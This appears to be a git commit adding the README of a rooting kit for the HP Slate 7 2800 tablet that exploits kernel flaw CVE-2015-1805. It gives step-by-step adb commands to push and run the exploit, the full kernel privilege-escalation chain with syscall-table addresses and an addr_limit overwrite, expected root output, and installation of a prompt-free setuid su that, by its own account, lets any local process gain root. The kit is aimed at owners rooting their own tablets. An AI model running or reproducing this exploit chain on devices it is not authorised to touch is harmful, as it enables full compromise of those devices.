initial exploit
This commit is contained in:
@@ -0,0 +1,445 @@
|
||||
# Root for the HP Slate 7 2800 on Android 4.1.1
|
||||
|
||||
**English** | [Русский](README.RU.md)
|
||||
|
||||
This repository contains a complete, self-contained kit for obtaining persistent
|
||||
root access on the **HP Slate 7 2800** running firmware **1.05.18** and kernel
|
||||
**Linux 3.0.8+** by exploiting the local vulnerability **CVE-2015-1805**. The
|
||||
kit was run on the actual tablet, and the result was verified from a fresh ADB
|
||||
session and after a normal reboot.
|
||||
|
||||
This is not a universal Android rooting tool. The exploit is specific to this
|
||||
HP kernel configuration. Do not run it on a different model, firmware, or
|
||||
kernel version.
|
||||
|
||||
## Verified configuration
|
||||
|
||||
| Parameter | Verified value |
|
||||
|---|---|
|
||||
| Manufacturer and model | HP Slate 7 2800 |
|
||||
| Android | 4.1.1, API 16, build JRO03H |
|
||||
| Product / device | `t7h` / `pine` |
|
||||
| Processor | Rockchip RK3066, ARMv7 |
|
||||
| Build fingerprint | `hp/t7h/pine:4.1.1/JRO03H/v1.05.18_user:user/release-keys` |
|
||||
| Kernel | `3.0.8+ #13 SMP PREEMPT Tue Jul 28 15:24:30 CST 2015` |
|
||||
| ABI | 32-bit ARM EABI5 |
|
||||
| SELinux | not present in the kernel configuration (`CONFIG_SECURITY` is disabled) |
|
||||
| `/system` partition | ext4, mounted read-only by default |
|
||||
|
||||
You can inspect the device without making any changes:
|
||||
|
||||
```sh
|
||||
adb devices -l
|
||||
adb shell getprop ro.product.model
|
||||
adb shell getprop ro.build.fingerprint
|
||||
adb shell getprop ro.build.version.sdk
|
||||
adb shell cat /proc/version
|
||||
```
|
||||
|
||||
Alternatively, use the script below. It will refuse to proceed if either the
|
||||
fingerprint or kernel version does not match:
|
||||
|
||||
```sh
|
||||
./scripts/check-target.sh
|
||||
./scripts/check-target.sh ADB_SERIAL
|
||||
```
|
||||
|
||||
## Repository contents
|
||||
|
||||
```text
|
||||
.
|
||||
├── bin/
|
||||
│ ├── hp-slate7-cve-2015-1805-root # verified exploit
|
||||
│ ├── hp-slate7-install-root # installs su into /system
|
||||
│ └── hp-slate7-su # minimal setuid-root wrapper
|
||||
├── src/
|
||||
│ ├── exploit/ # CVE source and device-specific changes
|
||||
│ ├── installer/install-root.c # installer source
|
||||
│ └── su/rootsh.S # minimal su source
|
||||
├── scripts/
|
||||
│ ├── build.sh # rebuilds all three ELF files
|
||||
│ ├── check-target.sh # safe compatibility check
|
||||
│ └── root-device.sh # verifies, uploads, and runs the kit
|
||||
├── SHA256SUMS # hashes of the verified bin/* files
|
||||
├── NOTICE # attribution for the original PoC
|
||||
└── LICENSE # GPL-3.0
|
||||
```
|
||||
|
||||
### File formats and purposes
|
||||
|
||||
| File | Format | Size | Purpose |
|
||||
|---|---:|---:|---|
|
||||
| `bin/hp-slate7-cve-2015-1805-root` | ELF 32-bit ARM EABI5, static, unstripped | 2,722,320 bytes | Exploits the CVE, obtains uid 0, and launches the installer |
|
||||
| `bin/hp-slate7-install-root` | ELF 32-bit ARM EABI5, static, stripped | 22,596 bytes | Temporarily remounts `/system` rw, installs `su`, and restores ro |
|
||||
| `bin/hp-slate7-su` | ELF 32-bit ARM EABI5, static, stripped | 656 bytes | Calls `setresgid(0,0,0)` and `setresuid(0,0,0)`, then launches `/system/bin/sh` |
|
||||
|
||||
SHA-256 checksums of the verified binaries:
|
||||
|
||||
```text
|
||||
6bf8ea09efb9f409dfc7aa5efbc3108e5c1a19fc5b07ae913328ef4639a7644f bin/hp-slate7-cve-2015-1805-root
|
||||
4857c71efc846636afc5b50d7f3c971c6eb68d3760f652086f2a38c5dc50bc4a bin/hp-slate7-install-root
|
||||
40626e555f71b71aa5ef7a727e9f6be55e552ef998ae3f49e9390f3e213c610e bin/hp-slate7-su
|
||||
```
|
||||
|
||||
Verification on macOS:
|
||||
|
||||
```sh
|
||||
shasum -a 256 -c SHA256SUMS
|
||||
```
|
||||
|
||||
Verification on Linux:
|
||||
|
||||
```sh
|
||||
sha256sum -c SHA256SUMS
|
||||
```
|
||||
|
||||
Use the files from `bin/` on the tablet: these are the exact bytes that were
|
||||
verified on the device. The `build/` directory is intended for local rebuilds
|
||||
and is not tracked by Git.
|
||||
|
||||
## Vulnerability used
|
||||
|
||||
[CVE-2015-1805](https://nvd.nist.gov/vuln/detail/CVE-2015-1805) is a flaw in the
|
||||
`pipe_read()` and `pipe_write()` implementations of older Linux kernels. When
|
||||
an atomic copy fails, the code incorrectly continues traversing the `iovec`
|
||||
array, potentially moving a pointer beyond its bounds. As a result, a local
|
||||
unprivileged process can corrupt memory, crash the kernel, or escalate its
|
||||
privileges. A detailed explanation of the mechanism was published on
|
||||
[oss-security](https://www.openwall.com/lists/oss-security/2015/06/06/2). The
|
||||
fixes can be found, among other places, in the upstream Linux commits
|
||||
[`637b58c`](https://github.com/torvalds/linux/commit/637b58c2887e5e57850865839cc75f59184b23d1)
|
||||
and [`f0d1bec`](https://github.com/torvalds/linux/commit/f0d1bec9d58d4c038d0ac958c9af82be6eb18045).
|
||||
|
||||
The tablet's `3.0.8+` kernel proved vulnerable. Before modifying kernel memory,
|
||||
the same race was tested separately with a harmless probe whose two write
|
||||
targets were both located in the test process's ordinary memory. It reported
|
||||
`CVE-2015-1805: VULNERABLE`, and the tablet remained accessible over ADB.
|
||||
|
||||
## Privilege-escalation chain
|
||||
|
||||
1. The exploit creates a race between `readv()`, memory mapping changes, and
|
||||
processing a large `iovec` array in the kernel's vulnerable pipe code.
|
||||
2. The resulting write primitive temporarily replaces the unused entry 222 in
|
||||
`sys_call_table` with the address of a small ARM trampoline in the exploit
|
||||
process.
|
||||
3. The table address is calculated through the high vector at `0xffff0008`.
|
||||
On the verified device, the instruction is `0xe59ff410`, and its literal
|
||||
points to `vector_swi = 0xc04d0d40`.
|
||||
4. `vector_swi` and `sys_call_table` were independently assembled from the
|
||||
[official HP Open Source 1.05.10 kernel archive](https://h30671.www3.hp.com/osp/Slate_7_Open_Source_Slate_7_28XX_Open_Source-1.05.10-20140212.tgz)
|
||||
(archive SHA-256:
|
||||
`dd69f0468973714fd9ba22cdfea7e96f39f651ee51b9cb537728d9dcadbafda2`)
|
||||
with the `rk30_t7h_dvt_defconfig` defconfig. Their offset is `0xc4`. The
|
||||
installed firmware has neither OABI nor seccomp, so the table's final
|
||||
runtime address is `0xc04d0e04`.
|
||||
5. The trampoline consists of exactly six ARM instructions. It obtains the
|
||||
current `sp`, aligns it to the 8,192-byte kernel stack size, and writes `-1`
|
||||
only to `thread_info.addr_limit` at offset 8. It contains no external calls,
|
||||
prologue, or compiler runtime code.
|
||||
6. Immediately after the temporary syscall returns, entry 222 is restored from
|
||||
entry 223. Both entries are `sys_ni_syscall` in the HP source; the pointer
|
||||
restored on the verified kernel is `0xc051900c`.
|
||||
7. Once `addr_limit` has been widened, pipe copying reads the current
|
||||
`task_struct`, locates `cred`, and validates the structure using the current
|
||||
uid/gid values, alignment, reference count, and the `real_cred == cred`
|
||||
condition. Only after these checks are the uid/gid values zeroed and the
|
||||
capability masks filled with ones.
|
||||
8. The process obtains `uid=0` and launches `/data/local/tmp/install-root`.
|
||||
The installer remounts `/system` rw, copies the payload to
|
||||
`/system/xbin/su`, assigns `root:root` ownership and mode `06755`, calls
|
||||
`sync()`, and remounts `/system` read-only.
|
||||
|
||||
The original `current_thread_info()` function from the old kernel headers was
|
||||
incompatible with modern Clang at `-O0`: an early prototype read an
|
||||
uninitialized word instead of the `sp` register and could crash the kernel. In
|
||||
this repository, it has been replaced with a verified naked ARM trampoline.
|
||||
The early binary is not included in the repository.
|
||||
|
||||
## Required software
|
||||
|
||||
### To use the ready-made files from `bin/`
|
||||
|
||||
- a computer running macOS or Linux; Windows is also possible with a suitable
|
||||
ADB USB driver, but this procedure was verified on macOS;
|
||||
- `adb` from Android SDK Platform Tools;
|
||||
- a working USB data cable;
|
||||
- USB debugging enabled and the computer's RSA key accepted on the tablet.
|
||||
|
||||
You do not need the Android NDK, Java, Python, fastboot, an unlocked bootloader,
|
||||
a custom recovery, a rooting APK, or network access. The exploit and payload
|
||||
are statically linked.
|
||||
|
||||
### To rebuild from source
|
||||
|
||||
- Zig 0.15.2; unpacking the portable archive is sufficient, with no system-wide
|
||||
package installation required;
|
||||
- Bash;
|
||||
- `shasum` or `sha256sum` to verify the result.
|
||||
|
||||
The Android NDK is still not required: Zig provides an ARM musl cross-toolchain.
|
||||
|
||||
## Preparing the tablet
|
||||
|
||||
1. Charge the tablet to at least 50%. It was at approximately 80% during the
|
||||
verified run.
|
||||
2. Boot Android normally and unlock the screen.
|
||||
3. Enable Developer options -> USB debugging.
|
||||
4. Connect the cable and accept the USB debugging RSA prompt if Android shows
|
||||
it.
|
||||
5. Do not run Towelroot, KingRoot, or other rooting applications concurrently.
|
||||
6. Close unnecessary applications. The exploit creates many threads and comes
|
||||
close to the limits of this old device.
|
||||
|
||||
Check the connection:
|
||||
|
||||
```sh
|
||||
adb devices -l
|
||||
```
|
||||
|
||||
The status must be `device`, not `offline` or `unauthorized`.
|
||||
|
||||
## Obtaining root: manual procedure
|
||||
|
||||
Change to the repository root and first verify that the device matches exactly:
|
||||
|
||||
```sh
|
||||
./scripts/check-target.sh
|
||||
```
|
||||
|
||||
If multiple devices are connected, pass the serial number to every command
|
||||
using `adb -s SERIAL`, or set the `ANDROID_SERIAL` environment variable.
|
||||
|
||||
Upload the three files using the names they expect for one another:
|
||||
|
||||
```sh
|
||||
adb push bin/hp-slate7-cve-2015-1805-root /data/local/tmp/cve-2015-1805-root
|
||||
adb push bin/hp-slate7-install-root /data/local/tmp/install-root
|
||||
adb push bin/hp-slate7-su /data/local/tmp/rootsh-armv7
|
||||
```
|
||||
|
||||
Set the permissions and flush the staged files to storage:
|
||||
|
||||
```sh
|
||||
adb shell 'chmod 755 /data/local/tmp/cve-2015-1805-root /data/local/tmp/install-root /data/local/tmp/rootsh-armv7; sync'
|
||||
```
|
||||
|
||||
Run the exploit **once**:
|
||||
|
||||
```sh
|
||||
adb shell '/data/local/tmp/cve-2015-1805-root; rc=$?; echo DEVICE_RC=$rc; exit $rc'
|
||||
```
|
||||
|
||||
Verified successful output:
|
||||
|
||||
```text
|
||||
offset:c4
|
||||
addr:c04d0d40
|
||||
[+] Done
|
||||
restored syscall 222 to 0xc051900c
|
||||
exploit rc=0 uid=0 gid=0
|
||||
installer uid=0 gid=0
|
||||
install-su ok
|
||||
DEVICE_RC=0
|
||||
```
|
||||
|
||||
If the device disappears from ADB for a few seconds, do not run the exploit
|
||||
again. Wait for it to return:
|
||||
|
||||
```sh
|
||||
adb wait-for-device
|
||||
```
|
||||
|
||||
## Automated procedure
|
||||
|
||||
The script verifies the fingerprint and kernel, checks the SHA-256 hashes,
|
||||
uploads the files, asks you to enter `ROOT`, runs the exploit, and verifies
|
||||
`uid=0`:
|
||||
|
||||
```sh
|
||||
./scripts/root-device.sh
|
||||
```
|
||||
|
||||
For multiple devices:
|
||||
|
||||
```sh
|
||||
./scripts/root-device.sh --serial ADB_SERIAL
|
||||
```
|
||||
|
||||
The `--yes` option disables the interactive confirmation and is intended only
|
||||
for deliberate automated use:
|
||||
|
||||
```sh
|
||||
./scripts/root-device.sh --serial ADB_SERIAL --yes
|
||||
```
|
||||
|
||||
## Verifying the result
|
||||
|
||||
Verify root from a **fresh** ADB shell, not from the exploit process's uid:
|
||||
|
||||
```sh
|
||||
adb shell 'id; /system/xbin/su -c id; echo SU_RC=$?'
|
||||
adb shell 'ls -l /system/xbin/su'
|
||||
adb shell 'cat /proc/mounts' | grep ' /system '
|
||||
```
|
||||
|
||||
Expected output:
|
||||
|
||||
```text
|
||||
uid=2000(shell) ...
|
||||
uid=0(root) gid=0(root) ...
|
||||
SU_RC=0
|
||||
-rwsr-sr-x root root ... su
|
||||
... /system ext4 ro,...
|
||||
```
|
||||
|
||||
Next, remove only the temporary staging files. The installed
|
||||
`/system/xbin/su` is not removed:
|
||||
|
||||
```sh
|
||||
adb shell '/system/xbin/su -c "rm -f /data/local/tmp/cve-2015-1805-root /data/local/tmp/install-root /data/local/tmp/rootsh-armv7; sync"'
|
||||
```
|
||||
|
||||
The kit does not create `/data/local.prop` or modify user data.
|
||||
|
||||
Perform a normal reboot and then verify persistent root:
|
||||
|
||||
```sh
|
||||
adb reboot
|
||||
adb wait-for-device
|
||||
adb shell getprop sys.boot_completed
|
||||
adb shell '/system/xbin/su -c id'
|
||||
```
|
||||
|
||||
The verified tablet produced the following result after reboot:
|
||||
|
||||
```text
|
||||
uid=0(root) gid=0(root) ...
|
||||
```
|
||||
|
||||
The installed file was pulled back from the tablet and matched
|
||||
`bin/hp-slate7-su` byte for byte:
|
||||
|
||||
```text
|
||||
40626e555f71b71aa5ef7a727e9f6be55e552ef998ae3f49e9390f3e213c610e
|
||||
```
|
||||
|
||||
## Using root
|
||||
|
||||
To run a single command:
|
||||
|
||||
```sh
|
||||
adb shell '/system/xbin/su -c id'
|
||||
adb shell '/system/xbin/su -c "ls -la /data"'
|
||||
```
|
||||
|
||||
`hp-slate7-su` is an intentionally minimal wrapper with no Android app,
|
||||
confirmation prompts, daemon, or permission log. Any local process capable of
|
||||
executing `/system/xbin/su` can potentially obtain root. Do not use this
|
||||
obsolete tablet for sensitive data after rooting it, and do not install
|
||||
untrusted APKs.
|
||||
|
||||
## Rebuilding from source
|
||||
|
||||
Specify the path to portable Zig 0.15.2, or add `zig` to `PATH`:
|
||||
|
||||
```sh
|
||||
ZIG_BIN=/absolute/path/to/zig ./scripts/build.sh
|
||||
```
|
||||
|
||||
The output will be written to `build/`:
|
||||
|
||||
```text
|
||||
build/hp-slate7-cve-2015-1805-root
|
||||
build/hp-slate7-install-root
|
||||
build/hp-slate7-su
|
||||
```
|
||||
|
||||
Check the file formats:
|
||||
|
||||
```sh
|
||||
file build/hp-slate7-*
|
||||
```
|
||||
|
||||
All three files must be 32-bit ARM EABI5 ELF files. With the verified Zig
|
||||
0.15.2 version, the installer and `su` rebuild byte-for-byte identically to the
|
||||
files in `bin/`. The exploit hash may differ because of absolute paths in DWARF
|
||||
and linker metadata; its critical six-instruction trampoline was byte-for-byte
|
||||
identical in the verification build. A rebuild does not replace the checksums
|
||||
of the files in `bin/` that were actually run on the tablet.
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### `unauthorized`
|
||||
|
||||
Unlock the screen and accept the USB debugging RSA key. If the prompt does not
|
||||
appear, reconnect the cable and run `adb devices -l` again.
|
||||
|
||||
### `offline` or the device disappears
|
||||
|
||||
Wait a few seconds and run `adb wait-for-device`. If the tablet has powered
|
||||
off, turn it on normally with the Power button. Do not run a second instance of
|
||||
the exploit concurrently.
|
||||
|
||||
### The exploit did not print `[+] Done`
|
||||
|
||||
The CVE is exploited through a race and may theoretically fail. Reboot the
|
||||
tablet before making a single retry. Do not run the binary in a loop: a failed
|
||||
race can crash the kernel.
|
||||
|
||||
### `su` exists, but the command exits with code 127
|
||||
|
||||
Verify the file's SHA-256 hash. An early research wrapper handled `argv`
|
||||
incorrectly on ARM and exited with code 127. This repository contains the
|
||||
corrected 656-byte version with SHA-256
|
||||
`40626e555f71b71aa5ef7a727e9f6be55e552ef998ae3f49e9390f3e213c610e`.
|
||||
|
||||
### The HP logo remains on screen, but ADB is already available
|
||||
|
||||
Check Android's actual state:
|
||||
|
||||
```sh
|
||||
adb shell getprop sys.boot_completed
|
||||
adb shell dumpsys window windows
|
||||
```
|
||||
|
||||
`sys.boot_completed=1` means that Android has booted even if the physical
|
||||
display is still showing an old frame.
|
||||
|
||||
## What was tested and what was not used
|
||||
|
||||
Other well-known approaches were safely ruled out or found unsuitable on this
|
||||
device: CVE-2013-6282, CVE-2013-2094, CVE-2012-0056, CVE-2013-4787, Dirty COW,
|
||||
and PingPongRoot. Towelroot/CVE-2014-3153 crashed this kernel and must not be
|
||||
used. CVE-2014-7951 made it possible to write a file through ADB restore path
|
||||
traversal, but the HP firmware did not load `/data/local.prop`, so this method
|
||||
did not provide root.
|
||||
|
||||
The bootloader uses an old Rockchip loader and did not appear as a standard
|
||||
fastboot device. Flashing a recovery or unlocking the bootloader was not
|
||||
required for this result.
|
||||
|
||||
## Provenance and license
|
||||
|
||||
The exploit code is based on
|
||||
[`mobilelinux/iovy_root_research`](https://github.com/mobilelinux/iovy_root_research),
|
||||
commit `f945796`, which in turn references
|
||||
[`dosomder/iovyroot`](https://github.com/dosomder/iovyroot). Device-specific
|
||||
changes include reducing the thread count, fixing the timeout, using a naked
|
||||
ARM trampoline, restoring the syscall table early, validating `cred`, and
|
||||
disabling the inapplicable SELinux branch.
|
||||
|
||||
The original notices have been preserved. The repository is distributed under
|
||||
GPL-3.0; see `LICENSE` and `NOTICE`.
|
||||
|
||||
## Disclaimer
|
||||
|
||||
Exploiting kernel memory always carries a risk of rebooting the device,
|
||||
corrupting the system, or losing data. This kit is intended only for an
|
||||
HP Slate 7 2800 that you own and whose firmware matches exactly. Back up any
|
||||
important data, and do not use it on devices belonging to other people.
|
||||
|
||||
---
|
||||
|
||||
Security research and documentation were completed with assistance from
|
||||
OpenAI Codex, powered by [GPT-5.6 Sol](https://developers.openai.com/api/docs/models/gpt-5.6-sol)
|
||||
with Daybreak Blue cybersecurity access.
|
||||
|
||||
Reference in New Issue
Block a user